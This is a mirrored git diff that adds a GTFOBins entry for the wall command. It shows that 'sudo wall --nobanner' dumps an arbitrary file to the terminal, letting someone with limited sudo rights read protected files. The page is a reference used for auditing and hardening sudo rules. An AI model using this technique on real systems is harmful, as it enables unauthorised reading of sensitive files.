mirror of
https://github.com/GTFOBins/GTFOBins.github.io
synced 2025-07-26 04:05:40 +02:00
8
_gtfobins/wall.md
Normal file
8
_gtfobins/wall.md
Normal file
@@ -0,0 +1,8 @@
|
||||
---
|
||||
description: The textual file is dumped on the current TTY (neither to `stdout` nor to `stderr`).
|
||||
functions:
|
||||
sudo:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
sudo wall --nobanner "$LFILE"
|
||||
---
|
Reference in New Issue
Block a user